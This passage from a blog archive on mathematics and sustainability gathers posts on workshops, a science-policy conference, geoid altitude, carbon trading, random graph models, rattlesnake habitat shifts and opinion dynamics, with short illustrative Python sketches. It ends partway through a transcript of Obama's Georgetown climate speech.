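# with no-flux boundaries.  We compare uniform harvesting with a single central
# no-take reserve; all parameter values are illustrative assumptions.
import numpy as np

L, nx = 20.0, 101
x = np.linspace(0, L, nx)
dx = x[1] - x[0]
dt, T, E = 0.01, 300.0, 0.4                     # time step, horizon, harvesting effort

def steady_state(h):
    u = np.full(nx, 0.5)                        # initial fish density
    for _ in range(int(T / dt)):
        lap = np.empty_like(u)
        lap[1:-1] = (u[2:] - 2 * u[1:-1] + u[:-2]) / dx**2
        lap[0] = 2 * (u[1] - u[0]) / dx**2      # no-flux ends
        lap[-1] = 2 * (u[-2] - u[-1]) / dx**2
        u = u + dt * (lap + u * (1 - u) - h * u)
    return u

h_uniform = np.full(nx, E)
h_reserve = np.where(np.abs(x - L / 2) < L / 6, 0.0, E)   # central no-take zone

for name, h in [("uniform", h_uniform), ("reserve", h_reserve)]:
    u = steady_state(h)
    total_yield = np.sum(h * u) * dx
    print(f"{name:8s} yield = {total_yield:.2f}, mean density = {u.mean():.2f}")
# Typically the reserve raises the mean density but lowers the yield.
```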

    Kent Morrison
    American Institute of Mathematics

    Posted in Resource Management, Sustainability | Leave a comment

    Mathematics and Sustainability – A Trio of Autumn Workshops

    In support of worldwide MPE2013 efforts, NSF’s Mathematical Biosciences Institute (MBI) at Ohio State University is hosting three autumn workshops aimed at the interface of mathematics and the science of sustainability. People interested in attending are welcome to apply here.

    • Sustainability and Complex Systems (September 16-20, 2013)

      Creating usable models for the sustainability of ecosystems has many mathematical challenges. Ecosystems are complex because they involve multiple interactions among organisms and between organisms and the physical environment, at multiple spatial and temporal scales, and with multiple feedback loops making connections between and across scales. The issue of scaling, and of deriving models at one scale from another, is well known to lead to substantial mathematical difficulties, as in passing from individual-scale descriptions of stochastic spatial movement to population-scale descriptions, or in obtaining diffusion limits. Here, for example, recent work has focused on alternatives to the diffusion limit. The mathematical challenges in the analysis of full ecosystems are truly great.

      This workshop aims to engage empiricists, computational and mathematical modelers, and mathematicians in a dialogue about how to best address the problems raised by the pressing need to understand complex ecological interactions at many scales. Its ultimate goal is to initiate transformative research that will provide new approaches and techniques, and perhaps new paradigms, for modeling complex systems and for connecting different types of models operating at different levels of detail. An important feature of the workshop will be afternoon sessions devoted to case studies with the goal of starting new collaborations and new research directions.

    • Rapid Evolution and Sustainability (October 7-11, 2013)

      Although evolution is often thought of as a slow process that proceeds on the time scale of millennia, in fact there are many very rapid evolutionary processes, often called contemporary evolution, that have profound effects on human health and welfare. Understanding the dynamic behavior of such processes is difficult because one is typically studying the co-evolution of two or more interacting complex systems. Whether the context is giving or not giving drugs, choosing to use or not use pesticides, or choosing when to use them, these are choices that have political, ethical and economic consequences. The consequences themselves depend in many cases on changing human cultural behavior, changing technology, and climate change. Mathematical modeling, including the invention of new mathematical structures, can help us understand these rapidly co-evolving systems and thus make clear the likely consequences of various policy choices.

    • Sustainable Management of Living Natural Resources (November 4-8, 2013)

      Natural resources, such as forests, fish, land, and biodiversity, while renewable, are being pushed to the brink and beyond by sectorial mismanagement and the resulting cumulative impacts on the macroscopic environmental and ecosystem conditions. For many, the solution is to take a more holistic or ecosystem-based approach to management (EBM). Mathematical models for EBM need to take into account both the dynamics of coupled ecological and economic systems and the game theoretic issues arising from the differing interests and values of different stakeholders. Some mathematical approaches to those issues have been developed in both ecology and economics.

      An important goal of the mathematical modeling is to analyze the likely consequences of policy choices proposed by Congress, government agencies, or eco-system managers. These choices will have important consequences not only for ecological systems, but also for the health and economic well being of human communities. Therefore, this workshop will have a public policy component, and at least two afternoons will be devoted to case studies which will develop new research directions.

    Posted in Mathematics, Sustainability, Workshop Announcement | Leave a comment

    AGU Science Policy Conference, Washington, DC, June 24-26

    The American Geophysical Union (AGU) held its 2nd Annual Science Policy Conference in the Walter E. Washington Convention Center in Washington, DC. This was a three-day meeting (June 24-26); because of other commitments I could only attend the second day (June 25) of the conference.

    The AGU, recognizing the societal relevance of geophysical research, is committed to improving the connection between science and policy. At the Science Policy Conferences, the AGU brings together Earth and space scientists, students, federal and state agency representatives, and industry professionals to explore ways for the geophysical sciences research community to inform and support sound policy decisions.

    The theme of the 2nd Annual Conference was “Preparing for the Future: The Intersection Between Science and Policy,” and the topics selected for this conference were Arctic Forum, Climate Change, Energy, Hazards, Oceans, and Technology and Infrastructure.

    The conference was attended by approximately 250 participants (my estimate) from academia, government and public service organizations, and the private sector.

    The first day (which I did not attend) was devoted to a workshop “to hone your ability to communicate effectively with policy makers, the press, and the general public.”

    The second day started with a plenary session, with speakers Dr. Cora Marrett (Acting Director, NSF) and Mr. Bart Gordon (Partner K&L Gates, former U.S. Representative,  former Chair of the House Committee on Science and Technology). Their presentations focused on the role of science for innovation and the challenges at the interface of science and policy.

    The plenary session was followed by nine panels, on Energy, Hazards, and Arctic Forum. Each topic was covered by three consecutive panels, each time with different panelists. I attended a panel on the Arctic Forum in the morning, a panel on Hazards in the first part of the afternoon, and a panel on Energy in the second part of the afternoon. A poster session ran simultaneously with the panel sessions and during the breaks between panels.

    The Arctic Forum focused on Arctic Change Research and U.S. Interagency Collaborations. It was moderated by Brendan Kelly, Assistant Director for Polar Science at the White House Office of Science and Technology Policy, with panelists Kathy Crane (NOAA), Gary Geernaert (DOE), Simon Stephenson (NSF), and Diane Wickland (NASA). They gave overviews of what is happening in their agencies for Arctic change research.

    The Hazards panel focused on The Science of Recent Severe Weather Events. It was moderated by Kelly Klima, Research Scientist at Carnegie Mellon University, with panelists Janice Coen (Project Scientist, NCAR), Andrew Castaldi (Senior VP, Swiss Re–a reinsurance company), Radley Horton (Research Scientist, Columbia University), and Sue Minter (Dep. Secretary, Vermont Department of Transportation). They discussed the possible connections between climate change and severe weather events, as well as the social and economic effects of droughts, wildfires and other disasters. All four talks were very informative; Ms. Coen discussed the complicated dynamics of wildfires, Mr. Castaldi explained in detail how risk is quantified in the insurance industry, Dr. Horton described the planning for NYC before and after Hurricane Sandy, and Ms. Minter discussed the lessons learned from tropical storm Irene (August 27, 2011).

    The Energy panel focused on Science Needs for U.S. Offshore Energy Development. It was moderated by Nick Juliano, a reporter for Greenwire and E&E News, with panelists Belinda Batten (Northwest National Marine Renewable Energy Center), Rodney Cluck (Bureau of Ocean Energy Management, U.S. Dept of the Interior), and Branko Kosovic (NCAR). By 2050, renewable sources are expected to supply as much as 80% of energy demand. The panelists discussed the status of research and development of various energy technologies based on waves, tides, currents, etc., collectively known as MHK (Marine Hydrokinetics), and wind.

    After the panel sessions, the conference participants were invited to a reception in the Rayburn House Office Building on Capitol Hill, where AGU Presidential Citations for Science and Society were given to James Balog (Founder/Director of “Extreme Ice Survey”), Richard Harris (Science Correspondent NPR), and Rush Holt (U.S. House of Representatives). The citations honored the recipients for their contributions to the public discussion of science.

    The third day (which I did not attend) had a similar format as the second day, with panels on Technology and Infrastructure, Climate Change, and Oceans.

    The conference was very well organized. I thought it was an interesting way to bring policy issues to the attention of the science community. Something we might consider for the mathematical sciences community.

    Posted in Climate Change, Conference Report, Geophysics | Leave a comment

    Fire Season

    “It’s fire season in the forests and wildlands of America.” So began an article by Barry Cipra (Fighting Fire with Data, SIAM News, July 2004). I recalled this article after hearing about the tragic events in the forest fires in Arizona earlier this week, and the news of the fires near Colorado Springs that threatened the homes of a number of my former colleagues.

    Cipra’s article reported on efforts by mathematicians and computational scientists working with NCAR (the National Center for Atmospheric Research) to develop real-time data-driven simulations of wildfires for use by fire fighters in the field. The simulations employ a coupled weather-wildfire model. The article was based in part on a talk at the 2003 SIAM Conference on Computational Science and Engineering by Janice Coen, “Computational Science and Engineering Aspects of Wildland Fire Modeling.” I wondered what had become of that work and whether those tools had found their way into the hands of fire fighters.

    Then today I received a copy of a press release from the University of Arizona showing that the research has indeed continued and that mathematical/computational tools like those described a decade ago are being used, and are playing a role in analyzing what went wrong in the tragedy at the Yarnell Hill Fire.

    As the press release points out, the problem with forecasts based on weather models is that the predictions are expressed in terms of percentages, and decisions must be made in the light of these uncertainties.

    It all points to the need for further research to reduce the uncertainties and to better understand the risks.

    James M. Crowley
    Executive Director, SIAM

    Posted in Data Visualization, Meteorology, Natural Disasters, Weather | Leave a comment

    What Does Altitude Mean?

    If we model the Earth as a sphere of radius $R$, then the altitude of a point is its distance to the center of the Earth minus $R$. But we know that the surface of the Earth is not exactly a sphere and is, in fact, better approximated by an ellipsoid. Again, it is possible to generalize the definition of altitude for an ellipsoid of revolution. For a given point $A$, we consider the segment joining it to the center $O$ of the ellipsoid. The half-line $OA$ cuts the ellipsoid in a point $B$, and the altitude is the difference between the length of $OA$ and that of $OB$.
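    With this definition, the altitude of a point over the sphere and over an ellipsoid of revolution can be computed directly from its Cartesian coordinates. In the sketch below, the coordinates of the point and the (WGS-84-like) semi-axes are made-up values for the illustration.

```python
# Altitude in the sense just defined: the distance from the Earth's center,
# minus the distance to the reference surface along the same half-line.  The
# point A and the semi-axes of the ellipsoid are made-up (WGS-84-like) values.
import numpy as np

a, b = 6378.137, 6356.752          # equatorial and polar semi-axes (km)
R = (2 * a + b) / 3                # a mean radius for the spherical model

A = np.array([3000.0, 4000.0, 4200.0])    # some point above the surface (km)
dist = np.linalg.norm(A)                  # length of OA

# Sphere of radius R: altitude = |OA| - R.
alt_sphere = dist - R

# Ellipsoid of revolution: the half-line OA meets the ellipsoid at B = t*A.
t = 1.0 / np.sqrt((A[0]**2 + A[1]**2) / a**2 + A[2]**2 / b**2)
alt_ellipsoid = dist * (1.0 - t)          # |OA| - |OB|

print(f"altitude over the sphere    : {alt_sphere:.1f} km")
print(f"altitude over the ellipsoid : {alt_ellipsoid:.1f} km")
```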

    So far, no problem. However, the Earth is not a perfect ellipsoid of revolution. Then what is the center of the Earth, and what does altitude mean? When we represent the Earth by a solid sphere or ellipsoid, we implicitly assume that we have a surface that approximately fits the surface of the Earth's oceans. (Of course, the surface of the oceans varies with the tides, and we must consider the mean surface of the Earth's oceans.) This surface is called a geoid. We then add the topographical details to the geoid.

    The point of view taken in geodesy is to consider the gravitational field generated by the Earth. On the surface of the Earth, the gravitational field is directed toward the Earth’s interior, and the center of gravity of the Earth, which is a natural candidate for the Earth’s center, is a singular point of this gravitational field. The gravitational field comes from a potential, and it is natural to consider the level surfaces of this potential. Thus, a geoid will be an equipotential of the gravitational field, chosen to give the best fit of the surface of the oceans with the geoid corresponding to the mean sea level. The differences between the geoid and an ellipsoid come not only from the presence of mountains, but also from the density variations inside the Earth. The geoid is then taken as the surface of altitude zero, and the altitude of a point $A$ is defined as its distance to the geoid measured along the normal through $A$ to the geoid. This normal is easily determined in practice, since it corresponds to the vertical as indicated by a carpenter’s level or a surveyor’s plumb bob. Let $O$ be the center of the geoid and $B$ the intersection point of the half-line $OA$ with the geoid. In general, the altitude of $A$ is not exactly equal to the difference between the length of $OA$ and that of $OB$, because the normal to the geoid through $A$ may not pass through $O$.

The difference between the geoid and an ellipsoid of revolution approximating the Earth can be as much as 100 meters, so it is quite significant. Early GPS receivers computed the altitude as the distance to an ellipsoidal model of the Earth. Modern receivers are able to correct this measurement and report the true altitude above the geoid.
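In practice the correction is a simple subtraction: if $h$ is the ellipsoidal height delivered by the receiver and $N$ is the geoid undulation (the height of the geoid above the ellipsoid, tabulated in models such as EGM2008), then the altitude above the geoid, the so-called orthometric height, is approximately $H = h - N$. Here is a minimal sketch in Python; the undulation values are hypothetical placeholders, since a real application would interpolate them from a published geoid model.

```python
# Minimal sketch: convert a GPS ellipsoidal height to an altitude above the geoid.
# The geoid undulations below are illustrative placeholders; a real application
# would interpolate them from a geoid model such as EGM2008.

SAMPLE_UNDULATIONS = {
    # (latitude, longitude) -> geoid undulation N in meters (hypothetical values)
    (48.85, 2.35): 44.5,     # near Paris
    (27.99, 86.93): -28.0,   # near Mount Everest
}

def orthometric_height(ellipsoidal_height_m: float, undulation_m: float) -> float:
    """Altitude above the geoid: H = h - N."""
    return ellipsoidal_height_m - undulation_m

if __name__ == "__main__":
    h = 8880.0                                  # height above the ellipsoid (m)
    N = SAMPLE_UNDULATIONS[(27.99, 86.93)]      # geoid undulation at that point (m)
    print(f"Altitude above the geoid: {orthometric_height(h, N):.1f} m")
```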

    Posted in Geophysics, Mathematics | Leave a comment

    How Much for My Ton of CO2?

Mathematics analyzes numerous aspects of financial markets and financial instruments. For markets trading CO2 emissions (either directly or as the CO2 equivalent of other greenhouse gases), mathematics is used to decide how cap-and-trade rules will operate. The cap-and-trade mechanism sets future caps on pollution emissions and issues emission rights that can be bought and sold by the companies concerned. Producers that overstep their allotted cap must pay a penalty. Designing such a market involves deciding, in particular, on a timetable for using permits, the initial mode of distribution (e.g., free allocation or auction), and how penalties operate.

    These trading markets are still in their early stages. Under the impetus of the Kyoto protocol and its extension, a few attempts have been made to open up markets in some countries, beginning with the European Community in 2005 and followed by more recent initiatives in Australia, China and some American states.

Emissions trading provides a financial incentive to reduce greenhouse gas emissions from some sectors of economic activity. From theory to practice, mathematics can help provide a clearer view of the design choices, so that setting up emissions trading leads to an effective reduction. Emissions trading also affects the price of goods and of raw materials, because greenhouse gas emissions are an externality of production.

    Game theory can be used to analyze interaction between stakeholders in these markets and to understand the connection between the design of cap and trade, the prices set for commodities such as electricity, windfall effects, and favored production technologies.

In addition, industrial production models can be used by a stakeholder subject to CO2 penalties. For a fixed market design, numerical simulation can quantify the stakeholder’s activity balance sheet (i.e., wealth produced and CO2 discharged) and calculate its subjective price for acquiring a permit. Using this information, different designs can be tested and compared against various criteria, including emissions reduction.
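To make this concrete, here is a minimal sketch, with entirely hypothetical numbers, of how such a simulation might evaluate a single producer. The producer chooses a mix of a dirty and a clean technology to meet a fixed demand under an emissions cap with a penalty on excess emissions; its subjective permit price is estimated as the extra profit it would earn if the cap were relaxed by one ton. In a full study, this single-agent calculation would sit inside a market model in which many such agents interact.

```python
# Minimal sketch (hypothetical numbers): one producer choosing a production mix
# under an emissions cap, and the marginal value it attaches to one extra permit.

DEMAND = 100.0          # units of output to produce
PRICE = 50.0            # revenue per unit of output
PENALTY = 40.0          # cost per ton of CO2 emitted above the cap

# Hypothetical technologies: (variable cost per unit, tons of CO2 per unit)
TECHS = {"coal": (20.0, 1.0), "gas": (30.0, 0.4)}

def best_profit(cap: float, step: float = 1.0):
    """Search over production mixes meeting demand; return (profit, emissions)."""
    best = None
    for i in range(int(DEMAND / step) + 1):
        q_coal = i * step
        q_gas = DEMAND - q_coal
        cost = q_coal * TECHS["coal"][0] + q_gas * TECHS["gas"][0]
        emissions = q_coal * TECHS["coal"][1] + q_gas * TECHS["gas"][1]
        penalty = PENALTY * max(0.0, emissions - cap)
        profit = DEMAND * PRICE - cost - penalty
        if best is None or profit > best[0]:
            best = (profit, emissions)
    return best

if __name__ == "__main__":
    cap = 60.0
    profit, emissions = best_profit(cap)
    profit_relaxed, _ = best_profit(cap + 1.0)
    print(f"profit = {profit:.1f}, emissions = {emissions:.1f} t CO2")
    print(f"subjective permit price (approx.) = {profit_relaxed - profit:.1f} per ton")
```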

    For more information:
    “Carbon Value project: a quantitative study of short-term carbon value” with INRIA and MINES ParisTech.

    Mireille Bossy (Inria Sophia Antipolis)
Nadia Maïzi (MINES ParisTech Sophia Antipolis)
    Odile Pourtallier (Inria Sophia Antipolis)

    Posted in Economics, Energy, Political Systems | Leave a comment

    Talking Across Fields

The AIM workshop on exponential random network models was an experiment, bringing together people in the applied social sciences, biologists, statisticians, and mathematicians who are interested in the emerging field of graph limit theory.  All of us think about networks in some form or other, but the language, examples and aims are often very different.  There has been spectacular progress in the mathematics of large networks, mostly for dense graphs (if there are n vertices there are order $n^2$ edges). A good deal of this is captured in Lovász’s recent book.  There has also been spectacular growth in the availability and use of real network data.  Some of this is huge (Facebook, Twitter, the Web) but some networks are smallish (I think of 500 tuberculosis patients in Canada with an edge between them if they have had contact in the past year).  Social scientists and others have developed a suite of techniques for working with such network data.  One central focus is exponential random graph models and their wonderful implementation in the STATNET package.

    The experimental types have discovered some really strange things. For simple, natural models (incorporating, say, the number of edges and the number of triangles) standard fitting methods (e.g., maximum likelihood) go crazy, giving very different looking graphs on repeated simulation from the same model.  The theorists had parallel results but in a limiting sense.  There was a lot of common ground possible BUT the usual “turf” and applied/theoretical barriers could well get in the way.  THEY DIDN’T and real progress was made.  Here are some of the things I learned:

1) For theorists, one question is “does anyone really use these models for anything real?” I found lots of examples.  Perhaps most striking, co-organizer Martina Morris and her colleagues fit these models to sexual contact data from Africa.  The incidence of HIV in these countries varies by factors of 10 (with something like 40% infected in Botswana).  What causes the disparity?  The data is extensive, but of poor quality.  Using exponential models, the different data sets can be cleaned up and compared.  She found that a simple factor, concurrent partnerships, could explain a lot of the variability.  Different countries have about the same number of lifetime sexual partners (and the same as for Western countries) BUT there are big differences in concurrency.  After discovering this, Martina got governments and tribal leaders and anyone else who would listen to stigmatize the behavior, and it really seems to make a difference.  There is a lot of substance hiding behind this paragraph and their work is a thrilling success.  Go take a look.

    2) The theorists had no idea how well developed the computational resources are.  One had only to suggest a project and someone could sit down in real time and try it out.  STATNET and R are amazing.

    3) I don’t think that the applied people had internalized some of the theoretical progress.  Graph limit theory is full of infinite dimensional analysis and its main applications have been to extremal graph theory.  After some of its potential applications (see below) were in believable focus, there was a lot of explaining and discussing.  This was useful for me too.

    4) Here is a success story from the conference: An exponential random graph model has an “unknowable” normalizing constant, which is a sum over all graphs on n nodes.  Even for little graphs (n=30) this is too big to handle with brute force.  Chatterjee and Diaconis proved a large sample approximation for the normalizing constant.  This was in terms of an infinite dimensional calculus of variations problem, but sometimes it reduces to a 1-dimensional optimization.  Their approximation is based on large deviations bounds (due to Chatterjee-Varadhan).  Its relevance to finite n could and should be questioned.  Mark Handcock and David Hunter programmed the tractable approximations and compared them to Monte Carlo approximations that are well developed in the applied world.  To everyone’s amazement, the approximations were spot on—even for n=20.  These approximations have parameters in them and are used to compute maximum likelihood and Bayes estimates.  IF things work out, there are really new tools to use and develop.
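To see why the normalizing constant is “unknowable,” note that for the edge-triangle model it is a sum with one term for each of the 2^(n(n-1)/2) labeled graphs on n nodes. The sketch below (mine, not from the workshop) computes it by brute force for a tiny n; already for n = 8 there are more than 268 million graphs, and for n = 30 the sum is hopeless.

```python
# Brute-force normalizing constant of an edge-triangle exponential random graph
# model: Z(b1, b2) = sum over all labeled graphs g on n nodes of
# exp(b1 * #edges(g) + b2 * #triangles(g)).  Feasible only for tiny n.

from itertools import combinations, product
from math import exp

def normalizing_constant(n: int, b1: float, b2: float) -> float:
    pairs = list(combinations(range(n), 2))      # possible edges
    triples = list(combinations(range(n), 3))    # possible triangles
    total = 0.0
    for assignment in product((0, 1), repeat=len(pairs)):
        edges = {p for p, present in zip(pairs, assignment) if present}
        n_edges = len(edges)
        n_triangles = sum(
            ((i, j) in edges and (i, k) in edges and (j, k) in edges)
            for (i, j, k) in triples
        )
        total += exp(b1 * n_edges + b2 * n_triangles)
    return total

if __name__ == "__main__":
    # n = 5 means 2**10 = 1024 graphs; n = 30 would mean 2**435 graphs.
    print(normalizing_constant(5, b1=-0.5, b2=0.2))
```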

Two questions had all of us interested.  First, once one realizes that this route is interesting, one can try to find approximations of the not-so-nice infinite-dimensional problems by discretizing.  This is quite close to what physicists do in “replica symmetry breaking,” so there are ideas to borrow and specific projects to try out.  Second, some of the statistics that the applied community finds natural are not continuous in graph limit space.  What does this mean in practice, AND can the theorists come up with continuous functionals that are similarly useful?

    There are a dozen other successes.  Some small, some big.  I think that all of us enlarged our worldview and made some useful new scientific friends.  BRAVO AIM!

    Persi Diaconis
    Stanford University

    Posted in Data Assimilation, Epidemiology, Mathematics, Social Systems, Statistics | Leave a comment

    Slithering Away: A Warming Planet Displaces Snakes’ Habitat

When paleobiologist Michelle Lawing joined field expeditions to collect rattlesnake data in the deserts of the American Southwest, she didn’t expect that her research would uncover such grim predictions for the future of rattlesnakes and their habitats.

To survive the Earth’s climate changes over the next century, rattlesnakes will need to migrate as much as 1,000 times more quickly than they have in the past to find suitable habitats, according to a study by Lawing and her colleague published in the journal PLoS ONE in 2011.

Lawing and her co-author David Polly, a geology professor at Indiana University Bloomington, synthesized information from climate-change cycle models, indicators of climate from the geological record, the evolution of rattlesnake species, and other data to develop what they call “paleophylogeographic models” of rattlesnake ranges. Using this information, they mapped, at 4,000-year intervals, the expansion and contraction of the ranges of 11 North American species of the rattlesnake genus Crotalus.

    The results predicted the future rate of change in suitable habitat to be two to three orders of magnitude greater than the average rate of change over the past 300 millennia, a time that included three major glacial cycles and significant variation in climate and temperature.

    “It is clear that the climate has changed in the past and will continue to change in the future, but what is surprising is the rate of change. I did not anticipate the magnitude of the difference between modeled rates of change in the past and future projections of the geographic displacement of suitable habitats,” Lawing says.

    Scientists question whether the snakes will be able to move fast enough to keep up with the changes. “If the past is any indication of the future, then probably they can’t,” Lawing says.

    Lawing completed the study while a doctoral student in the geological sciences and biology at Indiana University, Bloomington. Now a postdoctoral fellow at the National Institute for Mathematical and Biological Synthesis (NIMBioS), Lawing is developing a new framework called Dynamic Rotation Method for modeling the evolution of multivariate systems and for reconstructing phylogenetic changes.

    The method treats co-varying traits as a mathematical system that rotates, translates and scales through trait space. Lawing hopes that the application of the method will provide a synthetic interdisciplinary framework for integrating and comparing the study of phenotypic evolution, modularity and integration, geometric morphometrics, niche modeling, and habitat modeling in a phylogenetic context.

    For more information about Lawing and her research, including a link to her seminar about the rattlesnake study, click here.

    Reference:

Lawing AM, Polly PD. 2011. Pleistocene climate and phylogeny predict 21st century changes in rattlesnake distributions. PLoS ONE 6: e28554.


    Posted in Biosphere, Climate Change | Leave a comment

    Predicting the Unpredictable – Human Behaviors and Beyond

    No matter how surprising, outlandish, or even impossible it may seem, one of the next challenges of modern applied mathematics is the modeling of human behaviors. This has nothing to do, however, with the control of minds. Rather, thanks to its innate reductionism, mathematics is expected to help shed some light on those intricate decision-based mechanisms which lead people to produce, mostly unconsciously, complex collective trends out of relatively elementary individual interactions.

The flow of large crowds, the formation of opinions that affect socio-economic and voting dynamics, migration flows, and the spread of criminality in urban areas are quite different examples, but they have two basic characteristics in common: First, individuals almost always operate on the basis of simple one-to-one relationships. For instance, they try to avoid collisions with one another in crowds, or they discuss issues with acquaintances or are exposed to media influence and can change or radicalize their opinions. Second, the result of such interactions is the spontaneous emergence of group effects visible at a larger scale. For instance, pedestrians walking in opposite directions on a crowded sidewalk tend to organize themselves into lanes, or the population of a country changes its political inclination over time, sometimes rising suddenly against a regime.

In all these cases, a mathematical model is a great tool for schematizing, simplifying, and finally showing how such a transfer from individual to collective behaviors takes place. A mathematical model also raises our knowledge of these phenomena, which generally begins with qualitative observations and descriptions, to a quantitative level. As such, it allows one to go beyond the reproduction of known facts and also to address situations which have not yet been empirically reported or which would be impossible to test in practice. In fact, one of the distinguishing features of human behaviors is that they are hard to reproduce on demand, precisely because they pertain to living, not inert, “matter.”

As a matter of fact, historical applications of mathematics to more “classical” physics (think, for example, of fluid or gas dynamics) are also ultimately concerned with the quantitative description and simulation of real-world systems, so what is new here? True, but what makes the story really challenging from the point of view of mathematical research is the fact that to date we do not have a fully developed mathematical theory for the description of human behaviors. The point is that the new kinds of systems mentioned above force applied mathematicians to confront difficulties that classical applications have touched on only marginally. Just to mention a few key points:

    • A nonstandard multiscale question. Large-scale collective behaviors emerge spontaneously from interactions among a few individuals at a small scale. This is the phenomenon known as self-organization. Each individual is normally not even aware of the group s/he belongs to and of the group behavior s/he is contributing to, because s/he acts only locally. Consequently, no individual has full access to group behaviors or can voluntarily produce and control them. Therefore, models are required to adopt nonstandard multiscale approaches, which may not simply consist in passing from individual-based to macroscopic descriptions by means of limit procedures. In fact, in many cases it is necessary to retain an appropriate amount of local individuality even within a collective description. Moreover, the number of individuals involved is generally not as large as the number of molecules in a fluid or gas, which would justify such limits.
    • Randomness of human behaviors. Individual interaction rules can be interpreted in a deterministic way only up to a certain extent, due to the ultimate unpredictability of human reactions. This is the so-called bounded rationality, which means that two individuals may react differently even when facing the same conditions. In opinion formation problems this issue is of paramount importance, for the volatility of human behaviors can play a major role in causing extreme events with massive impact, known as Black Swans in the socio-economic sciences. Mathematical models should be able to incorporate, at the level of individual interactions, these stochastic effects, which in many cases may not be schematized as standard white noises. (A minimal opinion-dynamics sketch appears after this list.)
    • Lack of background field theories. Unlike inert matter, whose mathematical modeling can often be grounded in well-established physical theories, living matter still lacks a precise treatment in terms of quantitative theories from which the most appropriate mathematical formalizations can be identified. If, on the one hand, this is a handicap for the “industrial” production of ready-to-use models, on the other hand it offers mathematics a great opportunity to play a leading role in opening new avenues of scientific investigation. Mathematical models can indeed fill the quantitative gap by acting themselves as paradigms for exploring and testing conjectures. They can also highlight facts not yet observed empirically, motivating scientists to perform new, specific experiments aimed at confirming or rejecting such conjectures. Finally, mathematics can also take advantage of these applications to develop new mathematical methods and theories. In fact, nonstandard applications typically generate challenging analytical problems, which enhances the role of mathematical research as a necessary preliminary step toward mastering new models, eventually also at an industrial level.
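As an illustration of how elementary one-to-one interactions can produce collective trends, here is a minimal sketch (mine, not from the article) of a bounded-confidence opinion model of Deffuant type: agents hold opinions in [0, 1], randomly chosen pairs compromise only when their opinions are closer than a confidence threshold, and the population spontaneously organizes itself into a few opinion clusters.

```python
# Minimal bounded-confidence opinion model (Deffuant-type), for illustration only.
# Agents compromise with a random partner only if their opinions differ by less
# than a confidence threshold; clusters of opinion emerge from local interactions.

import random
from collections import Counter

def simulate(n_agents=200, threshold=0.2, mu=0.5, n_steps=50_000, seed=0):
    rng = random.Random(seed)
    opinions = [rng.random() for _ in range(n_agents)]
    for _ in range(n_steps):
        i, j = rng.randrange(n_agents), rng.randrange(n_agents)
        if i != j and abs(opinions[i] - opinions[j]) < threshold:
            # Both agents move toward each other by a fraction mu of their gap.
            delta = mu * (opinions[j] - opinions[i])
            opinions[i] += delta
            opinions[j] -= delta
    return opinions

if __name__ == "__main__":
    final = simulate()
    # Summarize the emergent clusters by rounding opinions to one decimal place.
    print(Counter(round(x, 1) for x in final))
```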

    ANDREA TOSIN
    Istituto per le Applicazioni del Calcolo “M. Picone”
    Consiglio Nazionale delle Ricerche
    Rome, Italy
    E-mail: a.tosin@iac.cnr.it
    URL: http://www.iac.cnr.it/~tosin

    Posted in Mathematics, Social Systems | Leave a comment

    A Day to Celebrate

The director of the Mathematics and Climate Research Network, Chris Jones, is co-organizing a meeting this week at INdAM in Rome, Italy, on “Mathematical Paradigms of Climate Science.” After President Obama’s speech, he was asked for comments by the Italian applied mathematics society. His comments are below, and here is the Italian press release.

    “This is a day to celebrate that we have a president of the US standing up for the world in which we live and the future generations that will inhabit it. The president showed an extraordinarily accurate understanding of the problem: the science we know and the irrefutable evidence that all point to a seriously changing climate. He explained the risks of inaction and outlined the elements of a plan of action. It has been a long time coming, but heartening that this moment has finally arrived.

    Mathematics has a key role to play in the path ahead. Understanding how the climate will be changing involves extensive experimentation that can only be done on complex mathematical models of the Earth system. We need, as a community, to rise to the challenge of building a framework and tools for the analysis of these models and for the compilation and interpretation of the resulting information.”

    Posted in Climate | Leave a comment

    President Barack Obama’s remarks on climate change at Georgetown University

    Here is the White House transcript of President Barack Obama’s remarks on climate change at Georgetown University Tuesday.
    1:45 P.M. EDT

    THE PRESIDENT: Thank you! (Applause.) Thank you, Georgetown! Thank you so much. Everybody, please be seated. And my first announcement today is that you should all take off your jackets. (Laughter.) I’m going to do the same. (Applause.) It’s not that sexy, now. (Laughter.)

    It is good to be back on campus, and it is a great privilege to speak from the steps of this historic hall that welcomed Presidents going back to George Washington.

    I want to thank your president, President DeGioia, who’s here today. (Applause.) I want to thank him for hosting us. I want to thank the many members of my Cabinet and my administration. I want to thank Leader Pelosi and the members of Congress who are here. We are very grateful for their support.

    And I want to say thank you to the Hoyas in the house for having me back. (Applause.) It was important for me to speak directly to your generation, because the decisions that we make now and in the years ahead will have a profound impact on the world that all of you inherit.

    On Christmas Eve, 1968, the astronauts of Apollo 8 did a live broadcast from lunar orbit. So Frank Borman, Jim Lovell, William Anders — the first humans to orbit the moon -– described what they saw, and they read Scripture from the Book of Genesis to the rest of us back here. And later that night, they took a photo that would change the way we see and think about our world.

    It was an image of Earth -– beautiful; breathtaking; a glowing marble of blue oceans, and green forests, and brown mountains brushed with white clouds, rising over the surface of the moon.

    And while the sight of our planet from space might seem routine today, imagine what it looked like to those of us seeing our home, our planet, for the first time. Imagine what it looked like to children like me. Even the astronauts were amazed. “It makes you realize,” Lovell would say, “just what you have back there on Earth.”

    And around the same time we began exploring space, scientists were studying changes taking place in the Earth’s atmosphere. Now, scientists had known since the 1800s that greenhouse gases like carbon dioxide trap heat, and that burning fossil fuels release those gases into the air. That wasn’t news. But in the late 1950s, the National Weather Service began measuring the levels of carbon dioxide in our atmosphere, with the worry that rising levels might someday disrupt the fragile balance that makes our planet so hospitable. And what they’ve found, year after year, is that the levels of carbon pollution in our atmosphere have increased dramatically.

    That science, accumulated and reviewed over decades, tells us that our planet is changing in ways that will have profound impacts on all of humankind.

    The 12 warmest years in recorded history have all come in the last 15 years. Last year, temperatures in some areas of the ocean reached record highs, and ice in the Arctic shrank to its smallest size on record — faster than most models had predicted it would. These are facts.

    Now, we know that no single weather event is caused solely by climate change. Droughts and fires and floods, they go back to ancient times. But we also know that in a world that’s warmer than it used to be, all weather events are affected by a warming planet. The fact that sea level in New York, in New York Harbor, are now a foot higher than a century ago — that didn’t cause Hurricane Sandy, but it certainly contributed to the destruction that left large parts of our mightiest city dark and underwater.

    The potential impacts go beyond rising sea levels. Here at home, 2012 was the warmest year in our history. Midwest farms were parched by the worst drought since the Dust Bowl, and then drenched by the wettest spring on record. Western wildfires scorched an area larger than the state of Maryland. Just last week, a heat wave in Alaska shot temperatures into the 90s.

